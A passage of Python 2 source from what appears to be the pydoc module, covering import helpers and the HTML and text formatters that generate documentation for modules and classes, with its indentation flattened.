elif len(lines) >= 2 and not rstrip(lines[1]):
return lines[0], join(lines[2:], '\n')
return '', join(lines, '\n')
def classname(object, modname):
"""Get a class name and qualify it with a module name if necessary."""
name = object.__name__
if object.__module__ != modname:
name = object.__module__ + '.' + name
return name
def isdata(object):
"""Check if an object is of a type that probably means it's data."""
return not (inspect.ismodule(object) or inspect.isclass(object) or
inspect.isroutine(object) or inspect.isframe(object) or
inspect.istraceback(object) or inspect.iscode(object))
def replace(text, *pairs):
"""Do a series of global replacements on a string."""
while pairs:
text = join(split(text, pairs[0]), pairs[1])
pairs = pairs[2:]
return text
def cram(text, maxlen):
"""Omit part of a string if needed to make it fit in a maximum length."""
if len(text) > maxlen:
pre = max(0, (maxlen-3)//2)
post = max(0, maxlen-3-pre)
return text[:pre] + '...' + text[len(text)-post:]
return text
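# Editor's note, illustrative only:
#   cram('supercalifragilistic', 10) -> 'sup...stic'
#   cram('short', 10)                -> 'short'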
_re_stripid = re.compile(r' at 0x[0-9a-f]{6,16}(>+)$', re.IGNORECASE)
def stripid(text):
"""Remove the hexadecimal id from a Python object representation."""
# The behaviour of %p is implementation-dependent in terms of case.
return _re_stripid.sub(r'\1', text)
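# Editor's note, illustrative only:
#   stripid('<function spam at 0x01ecaa80>') -> '<function spam>'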
def _is_some_method(obj):
return inspect.ismethod(obj) or inspect.ismethoddescriptor(obj)
def allmethods(cl):
methods = {}
for key, value in inspect.getmembers(cl, _is_some_method):
methods[key] = 1
for base in cl.__bases__:
methods.update(allmethods(base)) # all your base are belong to us
for key in methods.keys():
methods[key] = getattr(cl, key)
return methods
def _split_list(s, predicate):
"""Split sequence s via predicate, and return pair ([true], [false]).
The return value is a 2-tuple of lists,
([x for x in s if predicate(x)],
[x for x in s if not predicate(x)])
"""
yes = []
no = []
for x in s:
if predicate(x):
yes.append(x)
else:
no.append(x)
return yes, no
def visiblename(name, all=None, obj=None):
"""Decide whether to show documentation on a variable."""
# Certain special names are redundant.
_hidden_names = ('__builtins__', '__doc__', '__file__', '__path__',
'__module__', '__name__', '__slots__', '__package__')
if name in _hidden_names: return 0
# Private names are hidden, but special names are displayed.
if name.startswith('__') and name.endswith('__'): return 1
# Namedtuples have public fields and methods with a single leading underscore
if name.startswith('_') and hasattr(obj, '_fields'):
return 1
if all is not None:
# only document that which the programmer exported in __all__
return name in all
else:
return not name.startswith('_')
def classify_class_attrs(object):
"""Wrap inspect.classify_class_attrs, with fixup for data descriptors."""
def fixup(data):
name, kind, cls, value = data
if inspect.isdatadescriptor(value):
kind = 'data descriptor'
return name, kind, cls, value
return map(fixup, inspect.classify_class_attrs(object))
# ----------------------------------------------------- module manipulation
def ispackage(path):
"""Guess whether a path refers to a package directory."""
if os.path.isdir(path):
for ext in ('.py', '.pyc', '.pyo'):
if os.path.isfile(os.path.join(path, '__init__' + ext)):
return True
return False
def source_synopsis(file):
line = file.readline()
while line[:1] == '#' or not strip(line):
line = file.readline()
if not line: break
line = strip(line)
if line[:4] == 'r"""': line = line[1:]
if line[:3] == '"""':
line = line[3:]
if line[-1:] == '\\': line = line[:-1]
while not strip(line):
line = file.readline()
if not line: break
result = strip(split(line, '"""')[0])
else: result = None
return result
def synopsis(filename, cache={}):
"""Get the one-line summary out of a module file."""
mtime = os.stat(filename).st_mtime
lastupdate, result = cache.get(filename, (None, None))
if lastupdate is None or lastupdate < mtime:
info = inspect.getmoduleinfo(filename)
try:
file = open(filename)
except IOError:
# module can't be opened, so skip it
return None
if info and 'b' in info[2]: # binary modules have to be imported
try: module = imp.load_module('__temp__', file, filename, info[1:])
except: return None
result = (module.__doc__ or '').splitlines()[0]
del sys.modules['__temp__']
else: # text modules can be directly examined
result = source_synopsis(file)
file.close()
cache[filename] = (mtime, result)
return result
class ErrorDuringImport(Exception):
"""Errors that occurred while trying to import something to document it."""
def __init__(self, filename, exc_info):
exc, value, tb = exc_info
self.filename = filename
self.exc = exc
self.value = value
self.tb = tb
def __str__(self):
exc = self.exc
if type(exc) is types.ClassType:
exc = exc.__name__
return 'problem in %s - %s: %s' % (self.filename, exc, self.value)
def importfile(path):
"""Import a Python source file or compiled file given its path."""
magic = imp.get_magic()
file = open(path, 'r')
if file.read(len(magic)) == magic:
kind = imp.PY_COMPILED
else:
kind = imp.PY_SOURCE
file.close()
filename = os.path.basename(path)
name, ext = os.path.splitext(filename)
file = open(path, 'r')
try:
module = imp.load_module(name, file, path, (ext, 'r', kind))
except:
raise ErrorDuringImport(path, sys.exc_info())
file.close()
return module
def safeimport(path, forceload=0, cache={}):
"""Import a module; handle errors; return None if the module isn't found.
If the module *is* found but an exception occurs, it's wrapped in an
ErrorDuringImport exception and reraised. Unlike __import__, if a
package path is specified, the module at the end of the path is returned,
not the package at the beginning. If the optional 'forceload' argument
is 1, we reload the module from disk (unless it's a dynamic extension)."""
try:
# If forceload is 1 and the module has been previously loaded from
# disk, we always have to reload the module. Checking the file's
# mtime isn't good enough (e.g. the module could contain a class
# that inherits from another module that has changed).
if forceload and path in sys.modules:
if path not in sys.builtin_module_names:
# Avoid simply calling reload() because it leaves names in
# the currently loaded module lying around if they're not
# defined in the new source file. Instead, remove the
# module from sys.modules and re-import. Also remove any
# submodules because they won't appear in the newly loaded
# module's namespace if they're already in sys.modules.
subs = [m for m in sys.modules if m.startswith(path + '.')]
for key in [path] + subs:
# Prevent garbage collection.
cache[key] = sys.modules[key]
del sys.modules[key]
module = __import__(path)
except:
# Did the error occur before or after the module was found?
(exc, value, tb) = info = sys.exc_info()
if path in sys.modules:
# An error occurred while executing the imported module.
raise ErrorDuringImport(sys.modules[path].__file__, info)
elif exc is SyntaxError:
# A SyntaxError occurred before we could execute the module.
raise ErrorDuringImport(value.filename, info)
elif exc is ImportError and extract_tb(tb)[-1][2]=='safeimport':
# The import error occurred directly in this function,
# which means there is no such module in the path.
return None
else:
# Some other error occurred during the importing process.
raise ErrorDuringImport(path, sys.exc_info())
for part in split(path, '.')[1:]:
try: module = getattr(module, part)
except AttributeError: return None
return module
# ---------------------------------------------------- formatter base class
class Doc:
def document(self, object, name=None, *args):
"""Generate documentation for an object."""
args = (object, name) + args
# 'try' clause is to attempt to handle the possibility that inspect
# identifies something in a way that pydoc itself has issues handling;
# think 'super' and how it is a descriptor (which raises the exception
# by lacking a __name__ attribute) and an instance.
if inspect.isgetsetdescriptor(object): return self.docdata(*args)
if inspect.ismemberdescriptor(object): return self.docdata(*args)
try:
if inspect.ismodule(object): return self.docmodule(*args)
if inspect.isclass(object): return self.docclass(*args)
if inspect.isroutine(object): return self.docroutine(*args)
except AttributeError:
pass
if isinstance(object, property): return self.docproperty(*args)
return self.docother(*args)
def fail(self, object, name=None, *args):
"""Raise an exception for unimplemented types."""
message = "don't know how to document object%s of type %s" % (
name and ' ' + repr(name), type(object).__name__)
raise TypeError, message
docmodule = docclass = docroutine = docother = docproperty = docdata = fail
def getdocloc(self, object):
"""Return the location of module docs or None"""
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
docloc = os.environ.get("PYTHONDOCS",
"http://docs.python.org/library")
basedir = os.path.join(sys.exec_prefix, "lib",
"python"+sys.version[0:3])
if (isinstance(object, type(os)) and
(object.__name__ in ('errno', 'exceptions', 'gc', 'imp',
'marshal', 'posix', 'signal', 'sys',
'thread', 'zipimport') or
(file.startswith(basedir) and
not file.startswith(os.path.join(basedir, 'site-packages')))) and
object.__name__ not in ('xml.etree', 'test.pydoc_mod')):
if docloc.startswith("http://"):
docloc = "%s/%s" % (docloc.rstrip("/"), object.__name__)
else:
docloc = os.path.join(docloc, object.__name__ + ".html")
else:
docloc = None
return docloc
# -------------------------------------------- HTML documentation generator
class HTMLRepr(Repr):
"""Class for safely making an HTML representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def escape(self, text):
        return replace(text, '&', '&amp;', '<', '&lt;', '>', '&gt;')
def repr(self, object):
return Repr.repr(self, object)
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return self.escape(cram(stripid(repr(x)), self.maxother))
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + self.escape(test) + testrepr[0]
return re.sub(r'((\\[\\abfnrtv\'"]|\\[0-9]..|\\x..|\\u....)+)',
r'<font color="#c040c0">\1</font>',
self.escape(testrepr))
repr_str = repr_string
def repr_instance(self, x, level):
try:
return self.escape(cram(stripid(repr(x)), self.maxstring))
except:
return self.escape('<%s instance>' % x.__class__.__name__)
repr_unicode = repr_string
class HTMLDoc(Doc):
"""Formatter class for HTML documentation."""
# ------------------------------------------- HTML formatting utilities
_repr_instance = HTMLRepr()
repr = _repr_instance.repr
escape = _repr_instance.escape
def page(self, title, contents):
"""Format an HTML page."""
return '''
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Python: %s</title>
</head><body bgcolor="#f0f0f8">
%s
</body></html>''' % (title, contents)
def heading(self, title, fgcol, bgcol, extras=''):
"""Format a page heading."""
return '''
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="heading">
<tr bgcolor="%s">
<td valign=bottom>&nbsp;<br>
<font color="%s" face="helvetica, arial">&nbsp;<br>%s</font></td
><td align=right valign=bottom
><font color="%s" face="helvetica, arial">%s</font></td></tr></table>
    ''' % (bgcol, fgcol, title, fgcol, extras or '&nbsp;')
def section(self, title, fgcol, bgcol, contents, width=6,
                prelude='', marginalia=None, gap='&nbsp;'):
"""Format a section with a heading."""
if marginalia is None:
            marginalia = '<tt>' + '&nbsp;' * width + '</tt>'
result = '''<p>
<table width="100%%" cellspacing=0 cellpadding=2 border=0 summary="section">
<tr bgcolor="%s">
<td colspan=3 valign=bottom>&nbsp;<br>
<font color="%s" face="helvetica, arial">%s</font></td></tr>
''' % (bgcol, fgcol, title)
if prelude:
result = result + '''
<tr bgcolor="%s"><td rowspan=2>%s</td>
<td colspan=2>%s</td></tr>
<tr><td>%s</td>''' % (bgcol, marginalia, prelude, gap)
else:
result = result + '''
<tr><td bgcolor="%s">%s</td><td>%s</td>''' % (bgcol, marginalia, gap)
return result + '\n<td width="100%%">%s</td></tr></table>' % contents
def bigsection(self, title, *args):
"""Format a section with a big heading."""
title = '<big><strong>%s</strong></big>' % title
return self.section(title, *args)
def preformat(self, text):
"""Format literal preformatted text."""
text = self.escape(expandtabs(text))
return replace(text, '\n\n', '\n \n', '\n\n', '\n \n',
                       ' ', '&nbsp;', '\n', '<br>\n')
def multicolumn(self, list, format, cols=4):
"""Format a list of items into a multi-column list."""
result = ''
rows = (len(list)+cols-1)//cols
for col in range(cols):
result = result + '<td width="%d%%" valign=top>' % (100//cols)
for i in range(rows*col, rows*col+rows):
if i < len(list):
result = result + format(list[i]) + '<br>\n'
result = result + '</td>'
return '<table width="100%%" summary="list"><tr>%s</tr></table>' % result
def grey(self, text): return '<font color="#909090">%s</font>' % text
def namelink(self, name, *dicts):
"""Make a link for an identifier, given name-to-URL mappings."""
for dict in dicts:
if name in dict:
return '<a href="%s">%s</a>' % (dict[name], name)
return name
def classlink(self, object, modname):
"""Make a link for a class."""
name, module = object.__name__, sys.modules.get(object.__module__)
if hasattr(module, name) and getattr(module, name) is object:
return '<a href="%s.html#%s">%s</a>' % (
module.__name__, name, classname(object, modname))
return classname(object, modname)
def modulelink(self, object):
"""Make a link for a module."""
return '<a href="%s.html">%s</a>' % (object.__name__, object.__name__)
def modpkglink(self, data):
"""Make a link for a module or package to display in an index."""
name, path, ispackage, shadowed = data
if shadowed:
return self.grey(name)
if path:
url = '%s.%s.html' % (path, name)
else:
url = '%s.html' % name
if ispackage:
text = '<strong>%s</strong> (package)' % name
else:
text = name
return '<a href="%s">%s</a>' % (url, text)
def markup(self, text, escape=None, funcs={}, classes={}, methods={}):
"""Mark up some plain text, given a context of symbols to look for.
Each context dictionary maps object names to anchor names."""
escape = escape or self.escape
results = []
here = 0
pattern = re.compile(r'\b((http|ftp)://\S+[\w/]|'
r'RFC[- ]?(\d+)|'
r'PEP[- ]?(\d+)|'
r'(self\.)?(\w+))')
while True:
match = pattern.search(text, here)
if not match: break
start, end = match.span()
results.append(escape(text[here:start]))
all, scheme, rfc, pep, selfdot, name = match.groups()
if scheme:
                url = escape(all).replace('"', '&quot;')
results.append('<a href="%s">%s</a>' % (url, url))
elif rfc:
url = 'http://www.rfc-editor.org/rfc/rfc%d.txt' % int(rfc)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif pep:
url = 'http://www.python.org/dev/peps/pep-%04d/' % int(pep)
results.append('<a href="%s">%s</a>' % (url, escape(all)))
elif text[end:end+1] == '(':
results.append(self.namelink(name, methods, funcs, classes))
elif selfdot:
results.append('self.<strong>%s</strong>' % name)
else:
results.append(self.namelink(name, classes))
here = end
results.append(escape(text[here:]))
return join(results, '')
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None):
"""Produce HTML for a class tree as given by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + '<dt><font face="helvetica, arial">'
result = result + self.classlink(c, modname)
if bases and bases != (parent,):
parents = []
for base in bases:
parents.append(self.classlink(base, modname))
result = result + '(' + join(parents, ', ') + ')'
result = result + '\n</font></dt>'
elif type(entry) is type([]):
result = result + '<dd>\n%s</dd>\n' % self.formattree(
entry, modname, c)
return '<dl>\n%s</dl>\n' % result
def docmodule(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a module object."""
name = object.__name__ # ignore the passed-in name
try:
all = object.__all__
except AttributeError:
all = None
parts = split(name, '.')
links = []
for i in range(len(parts)-1):
links.append(
'<a href="%s.html"><font color="#ffffff">%s</font></a>' %
(join(parts[:i+1], '.'), parts[i]))
linkedname = join(links + parts[-1:], '.')
head = '<big><big><strong>%s</strong></big></big>' % linkedname
try:
path = inspect.getabsfile(object)
url = path
if sys.platform == 'win32':
import nturl2path
url = nturl2path.pathname2url(path)
filelink = '<a href="file:%s">%s</a>' % (url, path)
except TypeError:
filelink = '(built-in)'
info = []
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
info.append('version %s' % self.escape(version))
if hasattr(object, '__date__'):
info.append(self.escape(str(object.__date__)))
if info:
head = head + ' (%s)' % join(info, ', ')
docloc = self.getdocloc(object)
if docloc is not None:
docloc = '<br><a href="%(docloc)s">Module Docs</a>' % locals()
else:
docloc = ''
result = self.heading(
head, '#ffffff', '#7799ee',
'<a href=".">index</a><br>' + filelink + docloc)
def isnonbuiltinmodule(obj):
return inspect.ismodule(obj) and obj is not __builtin__
modules = inspect.getmembers(object, isnonbuiltinmodule)
classes, cdict = [], {}
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
(inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
cdict[key] = cdict[value] = '#' + key
for key, value in classes:
for base in value.__bases__:
key, modname = base.__name__, base.__module__
module = sys.modules.get(modname)
if modname != name and module and hasattr(module, key):
if getattr(module, key) is base:
if not key in cdict:
cdict[key] = cdict[base] = modname + '.html#' + key
funcs, fdict = [], {}
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
fdict[key] = '#-' + key
if inspect.isfunction(value): fdict[value] = fdict[key]
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
doc = self.markup(getdoc(object), self.preformat, fdict, cdict)
doc = doc and '<tt>%s</tt>' % doc
result = result + '<p>%s</p>\n' % doc
if hasattr(object, '__path__'):
modpkgs = []
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs.append((modname, name, ispkg, 0))
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
result = result + self.bigsection(
'Package Contents', '#ffffff', '#aa55cc', contents)
elif modules:
contents = self.multicolumn(
modules, lambda key_value, s=self: s.modulelink(key_value[1]))
result = result + self.bigsection(
'Modules', '#ffffff', '#aa55cc', contents)
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [
self.formattree(inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Classes', '#ffffff', '#ee77aa', join(contents))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name, fdict, cdict))
result = result + self.bigsection(
'Functions', '#ffffff', '#eeaa77', join(contents))
if data:
contents = []
for key, value in data:
contents.append(self.document(value, key))
result = result + self.bigsection(
'Data', '#ffffff', '#55aa55', join(contents, '<br>\n'))
if hasattr(object, '__author__'):
contents = self.markup(str(object.__author__), self.preformat)
result = result + self.bigsection(
'Author', '#ffffff', '#7799ee', contents)
if hasattr(object, '__credits__'):
contents = self.markup(str(object.__credits__), self.preformat)
result = result + self.bigsection(
'Credits', '#ffffff', '#7799ee', contents)
return result
def docclass(self, object, name=None, mod=None, funcs={}, classes={},
*ignored):
"""Produce HTML documentation for a class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
contents = []
push = contents.append
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('<hr>\n')
self.needone = 1
hr = HorizontalRule()
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
hr.maybe()
push('<dl><dt>Method resolution order:</dt>\n')
for base in mro:
push('<dd>%s</dd>\n' % self.classlink(base,
object.__module__))
push('</dl>\n')
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value, name, mod,
funcs, classes, mdict, object))
push('\n')
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
base = self.docother(getattr(object, name), name, mod)
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getattr(value, "__doc__", None)
else:
doc = None
if doc is None:
push('<dl><dt>%s</dl>\n' % base)
else:
doc = self.markup(getdoc(value), self.preformat,
funcs, classes, mdict)
doc = '<dd><tt>%s</tt>' % doc
push('<dl><dt>%s%s</dl>\n' % (base, doc))
push('\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
mdict = {}
for key, kind, homecls, value in attrs:
mdict[key] = anchor = '#' + name + '-' + key
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
pass
try:
# The value may not be hashable (e.g., a data attr with
# a dict or list value).
mdict[value] = anchor
except TypeError:
pass
while attrs:
if mro:
thisclass = mro.popleft()
else:
thisclass = attrs[0][2]
attrs, inherited = _split_list(attrs, lambda t: t[2] is thisclass)
if thisclass is __builtin__.object:
attrs = inherited
continue
elif thisclass is object:
tag = 'defined here'
else:
tag = 'inherited from %s' % self.classlink(thisclass,
object.__module__)
tag += ':<br>\n'
# Sort attrs by name.
try:
attrs.sort(key=lambda t: t[0])
except TypeError:
attrs.sort(lambda t1, t2: cmp(t1[0], t2[0])) # 2.3 compat
# Pump out the attrs, segregated by kind.
attrs = spill('Methods %s' % tag, attrs,
lambda t: t[1] == 'method')
attrs = spill('Class methods %s' % tag, attrs,
lambda t: t[1] == 'class method')
attrs = spill('Static methods %s' % tag, attrs,
lambda t: t[1] == 'static method')
attrs = spilldescriptors('Data descriptors %s' % tag, attrs,
lambda t: t[1] == 'data descriptor')
attrs = spilldata('Data and other attributes %s' % tag, attrs,
lambda t: t[1] == 'data')
assert attrs == []
attrs = inherited
contents = ''.join(contents)
if name == realname:
title = '<a name="%s">class <strong>%s</strong></a>' % (
name, realname)
else:
title = '<strong>%s</strong> = <a name="%s">class %s</a>' % (
name, name, realname)
if bases:
parents = []
for base in bases:
parents.append(self.classlink(base, object.__module__))
title = title + '(%s)' % join(parents, ', ')
doc = self.markup(getdoc(object), self.preformat, funcs, classes, mdict)
        doc = doc and '<tt>%s<br>&nbsp;</tt>' % doc
return self.section(title, '#000000', '#ffc8d8', contents, 3, doc)
def formatvalue(self, object):
"""Format an argument default value as text."""
return self.grey('=' + self.repr(object))
def docroutine(self, object, name=None, mod=None,
funcs={}, classes={}, methods={}, cl=None):
"""Produce HTML documentation for a function or method object."""
realname = object.__name__
name = name or realname
anchor = (cl and cl.__name__ or '') + '-' + name
note = ''
skipdocs = 0
if inspect.ismethod(object):
imclass = object.im_class
if cl:
if imclass is not cl:
note = ' from ' + self.classlink(imclass, mod)
else:
if object.im_self is not None:
note = ' method of %s instance' % self.classlink(
object.im_self.__class__, mod)
else:
note = ' unbound %s method' % self.classlink(imclass,mod)
object = object.im_func
if name == realname:
title = '<a name="%s"><strong>%s</strong></a>' % (anchor, realname)
else:
if (cl and realname in cl.__dict__ and
cl.__dict__[realname] is object):
reallink = '<a href="#%s">%s</a>' % (
cl.__name__ + '-' + realname, realname)
skipdocs = 1
else:
reallink = realname
title = '<a name="%s"><strong>%s</strong></a> = %s' % (
anchor, name, reallink)
if inspect.isfunction(object):
args, varargs, varkw, defaults = inspect.getargspec(object)
argspec = inspect.formatargspec(
args, varargs, varkw, defaults, formatvalue=self.formatvalue)
if realname == '<lambda>':
                title = '<strong>%s</strong> <em>lambda</em>&nbsp;' % name
argspec = argspec[1:-1] # remove parentheses
else:
argspec = '(...)'
decl = title + argspec + (note and self.grey(
'<font face="helvetica, arial">%s</font>' % note))
if skipdocs:
return '<dl><dt>%s</dt></dl>\n' % decl
else:
doc = self.markup(
getdoc(object), self.preformat, funcs, classes, methods)
doc = doc and '<dd><tt>%s</tt></dd>' % doc
return '<dl><dt>%s</dt>%s</dl>\n' % (decl, doc)
def _docdescriptor(self, name, value, mod):
results = []
push = results.append
if name:
push('<dl><dt><strong>%s</strong></dt>\n' % name)
if value.__doc__ is not None:
doc = self.markup(getdoc(value), self.preformat)
push('<dd><tt>%s</tt></dd>\n' % doc)
push('</dl>\n')
return ''.join(results)
def docproperty(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a property."""
return self._docdescriptor(name, object, mod)
def docother(self, object, name=None, mod=None, *ignored):
"""Produce HTML documentation for a data object."""
lhs = name and '<strong>%s</strong> = ' % name or ''
return lhs + self.repr(object)
def docdata(self, object, name=None, mod=None, cl=None):
"""Produce html documentation for a data descriptor."""
return self._docdescriptor(name, object, mod)
def index(self, dir, shadowed=None):
"""Generate an HTML index for a directory of modules."""
modpkgs = []
if shadowed is None: shadowed = {}
for importer, name, ispkg in pkgutil.iter_modules([dir]):
modpkgs.append((name, '', ispkg, name in shadowed))
shadowed[name] = 1
modpkgs.sort()
contents = self.multicolumn(modpkgs, self.modpkglink)
return self.bigsection(dir, '#ffffff', '#ee77aa', contents)
# -------------------------------------------- text documentation generator
class TextRepr(Repr):
"""Class for safely making a text representation of a Python object."""
def __init__(self):
Repr.__init__(self)
self.maxlist = self.maxtuple = 20
self.maxdict = 10
self.maxstring = self.maxother = 100
def repr1(self, x, level):
if hasattr(type(x), '__name__'):
methodname = 'repr_' + join(split(type(x).__name__), '_')
if hasattr(self, methodname):
return getattr(self, methodname)(x, level)
return cram(stripid(repr(x)), self.maxother)
def repr_string(self, x, level):
test = cram(x, self.maxstring)
testrepr = repr(test)
if '\\' in test and '\\' not in replace(testrepr, r'\\', ''):
# Backslashes are only literal in the string and are never
# needed to make any special characters, so show a raw string.
return 'r' + testrepr[0] + test + testrepr[0]
return testrepr
repr_str = repr_string
def repr_instance(self, x, level):
try:
return cram(stripid(repr(x)), self.maxstring)
except:
return '<%s instance>' % x.__class__.__name__
class TextDoc(Doc):
"""Formatter class for text documentation."""
# ------------------------------------------- text formatting utilities
_repr_instance = TextRepr()
repr = _repr_instance.repr
def bold(self, text):
"""Format a string in bold by overstriking."""
return join(map(lambda ch: ch + '\b' + ch, text), '')
def indent(self, text, prefix=' '):
"""Indent text by prepending a given prefix to each line."""
if not text: return ''
lines = split(text, '\n')
lines = map(lambda line, prefix=prefix: prefix + line, lines)
if lines: lines[-1] = rstrip(lines[-1])
return join(lines, '\n')
def section(self, title, contents):
"""Format a section with a given heading."""
return self.bold(title) + '\n' + rstrip(self.indent(contents)) + '\n\n'
# ---------------------------------------------- type-specific routines
def formattree(self, tree, modname, parent=None, prefix=''):
"""Render in text a class tree as returned by inspect.getclasstree()."""
result = ''
for entry in tree:
if type(entry) is type(()):
c, bases = entry
result = result + prefix + classname(c, modname)
if bases and bases != (parent,):
parents = map(lambda c, m=modname: classname(c, m), bases)
result = result + '(%s)' % join(parents, ', ')
result = result + '\n'
elif type(entry) is type([]):
result = result + self.formattree(
entry, modname, c, prefix + ' ')
return result
def docmodule(self, object, name=None, mod=None):
"""Produce text documentation for a given module object."""
name = object.__name__ # ignore the passed-in name
synop, desc = splitdoc(getdoc(object))
result = self.section('NAME', name + (synop and ' - ' + synop))
try:
all = object.__all__
except AttributeError:
all = None
try:
file = inspect.getabsfile(object)
except TypeError:
file = '(built-in)'
result = result + self.section('FILE', file)
docloc = self.getdocloc(object)
if docloc is not None:
result = result + self.section('MODULE DOCS', docloc)
if desc:
result = result + self.section('DESCRIPTION', desc)
classes = []
for key, value in inspect.getmembers(object, inspect.isclass):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None
or (inspect.getmodule(value) or object) is object):
if visiblename(key, all, object):
classes.append((key, value))
funcs = []
for key, value in inspect.getmembers(object, inspect.isroutine):
# if __all__ exists, believe it. Otherwise use old heuristic.
if (all is not None or
inspect.isbuiltin(value) or inspect.getmodule(value) is object):
if visiblename(key, all, object):
funcs.append((key, value))
data = []
for key, value in inspect.getmembers(object, isdata):
if visiblename(key, all, object):
data.append((key, value))
modpkgs = []
modpkgs_names = set()
if hasattr(object, '__path__'):
for importer, modname, ispkg in pkgutil.iter_modules(object.__path__):
modpkgs_names.add(modname)
if ispkg:
modpkgs.append(modname + ' (package)')
else:
modpkgs.append(modname)
modpkgs.sort()
result = result + self.section(
'PACKAGE CONTENTS', join(modpkgs, '\n'))
# Detect submodules as sometimes created by C extensions
submodules = []
for key, value in inspect.getmembers(object, inspect.ismodule):
if value.__name__.startswith(name + '.') and key not in modpkgs_names:
submodules.append(key)
if submodules:
submodules.sort()
result = result + self.section(
'SUBMODULES', join(submodules, '\n'))
if classes:
classlist = map(lambda key_value: key_value[1], classes)
contents = [self.formattree(
inspect.getclasstree(classlist, 1), name)]
for key, value in classes:
contents.append(self.document(value, key, name))
result = result + self.section('CLASSES', join(contents, '\n'))
if funcs:
contents = []
for key, value in funcs:
contents.append(self.document(value, key, name))
result = result + self.section('FUNCTIONS', join(contents, '\n'))
if data:
contents = []
for key, value in data:
contents.append(self.docother(value, key, name, maxlen=70))
result = result + self.section('DATA', join(contents, '\n'))
if hasattr(object, '__version__'):
version = str(object.__version__)
if version[:11] == '$' + 'Revision: ' and version[-1:] == '$':
version = strip(version[11:-1])
result = result + self.section('VERSION', version)
if hasattr(object, '__date__'):
result = result + self.section('DATE', str(object.__date__))
if hasattr(object, '__author__'):
result = result + self.section('AUTHOR', str(object.__author__))
if hasattr(object, '__credits__'):
result = result + self.section('CREDITS', str(object.__credits__))
return result
def docclass(self, object, name=None, mod=None, *ignored):
"""Produce text documentation for a given class object."""
realname = object.__name__
name = name or realname
bases = object.__bases__
def makename(c, m=object.__module__):
return classname(c, m)
if name == realname:
title = 'class ' + self.bold(realname)
else:
title = self.bold(name) + ' = class ' + realname
if bases:
parents = map(makename, bases)
title = title + '(%s)' % join(parents, ', ')
doc = getdoc(object)
contents = doc and [doc + '\n'] or []
push = contents.append
# List the mro, if non-trivial.
mro = deque(inspect.getmro(object))
if len(mro) > 2:
push("Method resolution order:")
for base in mro:
push(' ' + makename(base))
push('')
# Cute little class to pump out a horizontal rule between sections.
class HorizontalRule:
def __init__(self):
self.needone = 0
def maybe(self):
if self.needone:
push('-' * 70)
self.needone = 1
hr = HorizontalRule()
def spill(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
try:
value = getattr(object, name)
except Exception:
# Some descriptors may meet a failure in their __get__.
# (bug #1785)
push(self._docdescriptor(name, value, mod))
else:
push(self.document(value,
name, mod, object))
return attrs
def spilldescriptors(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
push(self._docdescriptor(name, value, mod))
return attrs
def spilldata(msg, attrs, predicate):
ok, attrs = _split_list(attrs, predicate)
if ok:
hr.maybe()
push(msg)
for name, kind, homecls, value in ok:
if (hasattr(value, '__call__') or
inspect.isdatadescriptor(value)):
doc = getdoc(value)
else:
doc = None
push(self.docother(getattr(object, name),
name, mod, maxlen=70, doc=doc) + '\n')
return attrs
attrs = filter(lambda data: visiblename(data[0], obj=object),
classify_class_attrs(object))
while attrs:
if mro:
